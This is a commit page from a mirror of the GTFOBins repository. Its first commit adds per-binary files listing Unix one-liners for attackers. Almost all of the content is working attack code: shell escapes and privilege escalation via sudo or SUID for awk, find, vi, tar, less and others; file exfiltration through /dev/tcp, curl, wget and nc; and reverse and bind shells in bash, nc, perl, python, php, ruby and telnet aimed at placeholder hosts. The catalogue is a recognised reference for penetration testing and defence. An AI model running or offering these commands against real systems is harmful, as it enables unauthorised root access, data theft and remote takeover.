public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-07-25 19:54:14 +02:00
Code Issues Projects Releases Wiki Activity

First commit

Browse Source
This commit is contained in:
Emilio Pinna
2018-05-21 20:14:41 +01:00
commit b81e57005a
57 changed files with 1082 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
_gtfobins/awk.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: awk 'BEGIN {system("/bin/sh")}'
sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
suid-limited:
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
---

40
_gtfobins/bash.md Normal file
View File

@@ -0,0 +1,40 @@
---
functions:
exec-interactive:
- code: bash
sudo-enabled:
- code: sudo bash
suid-enabled:
- code: ./bash -p
upload:
- description: Send local file in the body of an HTTP POST request.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_send
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
- description: Send local file using a TCP connection.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_send
cat $LFILE > /dev/tcp/$RHOST/$RPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_get
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
- description: Fetch remote file using a TCP connection.
code: |-
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_get
bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE
reverse-shell:
- code: |
RHOST=127.0.0.1
RPORT=8000
exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done
---

9
_gtfobins/csh.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: csh
sudo-enabled:
- code: sudo csh
suid-enabled:
- code: ./csh -b
---

15
_gtfobins/curl.md Normal file
View File

@@ -0,0 +1,15 @@
---
functions:
upload:
- description: Send local file with an HTTP POST request.
code: |
URL=http://10.0.0.1/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
curl $URL -o $LFILE
---

15
_gtfobins/ed.md Normal file
View File

@@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
ed
!/bin/sh
sudo-enabled:
- code: |
sudo ed
!/bin/sh
suid-limited:
- code: |-
./ed
!/bin/sh -p
---

9
_gtfobins/emacs.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: emacs -Q -nw --eval '(term "/bin/sh")'
sudo-enabled:
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
suid-enabled:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
---

9
_gtfobins/env.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: env /bin/sh
sudo-enabled:
- code: sudo env /bin/sh
suid-enabled:
- code: ./env /bin/sh -p
---

9
_gtfobins/expect.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: expect -c 'spawn /bin/sh;interact'
sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact'
suid-enabled:
- code: ./expect -c 'spawn /bin/sh -p;interact'
---

9
_gtfobins/find.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: find . -exec /bin/sh \; -quit
sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit
suid-enabled:
- code: ./find . -exec /bin/sh -p \; -quit
---

23
_gtfobins/ftp.md Normal file
View File

@@ -0,0 +1,23 @@
---
functions:
exec-interactive:
- code: |
ftp
!/bin/sh
sudo-enabled:
- code: |
sudo ftp
!/bin/sh
upload:
- description: Send local file to a FTP server.
code: |
RHOST=10.0.0.1
ftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a FTP server.
code: |
RHOST=10.0.0.1
ftp $RHOST
get file_to_get
---

7
_gtfobins/gdb.md Normal file
View File

@@ -0,0 +1,7 @@
---
functions:
exec-interactive:
- code: gdb -nx -ex '!sh' -ex quit
sudo-enabled:
- code: sudo gdb -nx -ex '!sh' -ex quit
---

9
_gtfobins/ionice.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: ionice /bin/sh
sudo-enabled:
- code: sudo ionice /bin/sh
suid-enabled:
- code: ./ionice /bin/sh -p
---

10
_gtfobins/ld.so.md Normal file
View File

@@ -0,0 +1,10 @@
---
description: Ld.so is the Linux dynamic linker/loader. Its file name and location might change between Linux versions.
functions:
exec-interactive:
- code: /lib/ld.so /bin/sh
sudo-enabled:
- code: sudo /lib/ld.so /bin/sh
suid-enabled:
- code: ./ld.so /bin/sh -p
---

18
_gtfobins/less.md Normal file
View File

@@ -0,0 +1,18 @@
---
functions:
exec-interactive:
- code: |
less /etc/profile
!/bin/sh
- code: |
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v
sudo-enabled:
- code: |
sudo less /etc/profile
!/bin/sh
suid-limited:
- code: |-
./less /etc/profile
!/bin/sh -p
---

15
_gtfobins/man.md Normal file
View File

@@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
man man
!/bin/sh
sudo-enabled:
- code: |
sudo man man
!/bin/sh
suid-limited:
- code: |-
./man man
!/bin/sh -p
---

15
_gtfobins/more.md Normal file
View File

@@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
TERM= more /etc/profile
!/bin/sh
sudo-enabled:
- code: |
TERM= sudo -E more /etc/profile
!/bin/sh
suid-limited:
- code: |-
TERM= ./more /etc/profile
!/bin/sh -p
---

25
_gtfobins/nc.md Normal file
View File

@@ -0,0 +1,25 @@
---
functions:
upload:
- description: Serve a file on a TCP port.
code: |
RHOST=10.0.0.1
RPORT=8000
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"
download:
- description: Fetch remote file from a remote TCP port.
code: |-
LPORT=8000
LFILE=file_to_get
nc -l -p $LPORT > "$LFILE"
reverse-shell:
- code: |
RHOST=10.0.0.1
RPORT=8000
nc -e /bin/sh $RHOST $RPORT
bind-shell:
- code: |
LPORT=8000
nc -lp $LPORT -e /bin/sh
---

14
_gtfobins/perl.md Normal file
View File

@@ -0,0 +1,14 @@
---
functions:
exec-interactive:
- code: perl -e 'exec "/bin/sh";'
sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";'
suid-enabled:
- code: ./perl -e 'exec "/bin/sh";'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=12346
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
---

39
_gtfobins/php.md Normal file
View File

@@ -0,0 +1,39 @@
---
functions:
exec-non-interactive:
- code: |
export CMD="ls /"
php -r 'system($_ENV["CMD"]);'
- code: |
export CMD="ls /"
php -r 'passthru($_ENV["CMD"]);'
- code: |
export CMD="ls /"
php -r 'print(shell_exec($_ENV["CMD"]));'
- code: |
export CMD="ls /"
php -r '$r=array(); exec($_ENV["CMD"], $r); print(join(\"\\n\",$r));'
- code: |
export CMD="ls /"
php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
- code: |
export CMD="ls /"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
upload:
- description: Serve files in the local folder running an HTTP server.
code: |
LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=8000
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
---

32
_gtfobins/python2.md Normal file
View File

@@ -0,0 +1,32 @@
---
functions:
exec-interactive:
- code: python -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python -c 'import os; os.system("/bin/sh")'
suid-enabled:
- code: ./python -c 'import os; os.system("/bin/sh -p")'
upload:
- description: Send local file via "d" parameter of a HTTP POST request.
code: |
export URL=http://10.0.0.1/
export LFILE=file_to_send
python -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=8888
python -m SimpleHTTPServer $LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=8000
python -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
load-library:
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
---

32
_gtfobins/python3.md Normal file
View File

@@ -0,0 +1,32 @@
---
functions:
exec-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")'
sudo-enabled:
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
suid-enabled:
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
upload:
- description: Send local file via "d" parameter of a HTTP POST request.
code: |
export URL=http://10.0.0.1/
export LFILE=file_to_send
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
- description: Serve files in the local folder running an HTTP server.
code: |
LPORT=8888
python3 -m http.server $LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
reverse-shell:
- code: |
export RHOST=127.0.0.1
export RPORT=8000
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
load-library:
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
---

9
_gtfobins/rpm.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
---

9
_gtfobins/rpmquery.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
sudo-enabled:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
---

19
_gtfobins/ruby.md Normal file
View File

@@ -0,0 +1,19 @@
---
functions:
exec-interactive:
- code: ruby -e 'exec "/bin/sh"'
sudo-enabled:
- code: sudo ruby -e 'exec "/bin/sh"'
reverse-shell:
- code: |
export RHOST=10.0.0.1
export RPORT=8000
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
load-library:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
upload:
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
---

36
_gtfobins/scp.md Normal file
View File

@@ -0,0 +1,36 @@
---
functions:
exec-non-interactive:
- code: |
TF=$(mktemp)
CMD="touch /tmp/unrestricted"
echo "$CMD" > "$TF"
chmod +x "$TF"
scp -S $TF x y:
sudo-enabled:
- code: |
TF=$(mktemp)
CMD="touch /tmp/unrestricted"
echo "$CMD" > "$TF"
chmod +x "$TF"
sudo scp -S $TF x y:
suid-limited:
- code: |
TF=$(mktemp)
CMD="touch /tmp/unrestricted"
echo "$CMD" > "$TF"
chmod +x "$TF"
./scp -S $TF a b:
upload:
- description: Send local file to a SSH server.
code: |
RPATH=user@10.0.0.1:~/where_to_save
LPATH=file_to_send
scp $LFILE $RPATH
download:
- description: Fetch a remote file from a SSH server.
code: |
RPATH=user@10.0.0.1:~/file_to_get
LFILE=where_to_save
scp $RPATH $LFILE
---

9
_gtfobins/setarch.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: setarch $(arch) /bin/sh
sudo-enabled:
- code: setarch $(arch) /bin/sh
suid-enabled:
- code: ./setarch $(arch) /bin/sh -p
---

20
_gtfobins/ssh.md Normal file
View File

@@ -0,0 +1,20 @@
---
functions:
exec-interactive:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost /bin/bash --noprofile --norc
download:
- description: Fetch a remote file from a SSH server.
code: |
HOST=user@10.0.0.1
RPATH=file_to_get
LPATH=where_to_save
ssh $HOST "cat $RPATH" > $LPATH
upload:
- description: Send local file to a SSH server.
code: |
HOST=user@10.0.0.1
RPATH=where_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
---

9
_gtfobins/strace.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: strace -o /dev/null /bin/sh
sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh
suid-enabled:
- code: ./strace -o /dev/null /bin/sh -p
---

10
_gtfobins/tar.md Normal file
View File

@@ -0,0 +1,10 @@
---
functions:
exec-interactive:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited:
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh
-p"
---

9
_gtfobins/taskset.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: taskset 1 /bin/sh
sudo-enabled:
- code: sudo taskset 1 /bin/sh
suid-enabled:
- code: ./taskset 1 /bin/sh -p
---

15
_gtfobins/tclsh.md Normal file
View File

@@ -0,0 +1,15 @@
---
functions:
exec-interactive:
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
sudo-enabled:
- code: |
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
suid-enabled:
- code: |
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr
---

34
_gtfobins/telnet.md Normal file
View File

@@ -0,0 +1,34 @@
---
functions:
exec-interactive:
- code: |
RHOST=www.google.com
RPORT=80
telnet $RHOST $RPORT
^]
!/bin/sh
description: MacOS only.
reverse-shell:
- code: |
RHOST=127.0.0.1
RPORT=8000
TF=$(mktemp)
rm $TF
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
sudo-enabled:
- code: |
RHOST=www.google.com
RPORT=80
sudo telnet $RHOST $RPORT
^]
!/bin/sh
description: MacOS only.
suid-limited:
- code: |
RHOST=www.google.com
RPORT=80
./telnet $RHOST $RPORT
^]
!/bin/sh
description: MacOS only.
---

15
_gtfobins/tftp.md Normal file
View File

@@ -0,0 +1,15 @@
---
functions:
upload:
- description: Send local file to a TFTP server.
code: |
RHOST=10.0.0.1
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=10.0.0.1
tftp $RHOST
get file_to_get
---

13
_gtfobins/vi.md Normal file
View File

@@ -0,0 +1,13 @@
---
functions:
exec-interactive:
- code: vi -c ':!/bin/sh'
- code: |
vi
:set shell=/bin/sh
:shell
sudo-enabled:
- code: sudo vi -c ':!/bin/sh'
suid-enabled:
- code: ./vi -c ':!/bin/sh -p'
---

15
_gtfobins/wget.md Normal file
View File

@@ -0,0 +1,15 @@
---
functions:
upload:
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
code: |
export URL=http://10.0.0.1/
export LFILE=file_to_send
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
export URL=http://10.0.0.1/file_to_get
export LFILE=file_to_get
wget $URL -O $LFILE
---

11
_gtfobins/wish.md Normal file
View File

@@ -0,0 +1,11 @@
---
functions:
exec-interactive:
- code: |
wish
exec /bin/sh <@stdin >@stdout 2>@stderr
sudo-enabled:
- code: |
sudo wish
exec /bin/sh <@stdin >@stdout 2>@stderr
---

9
_gtfobins/zsh.md Normal file
View File

@@ -0,0 +1,9 @@
---
functions:
exec-interactive:
- code: zsh
sudo-enabled:
- code: sudo zsh
suid-enabled:
- code: ./zsh
---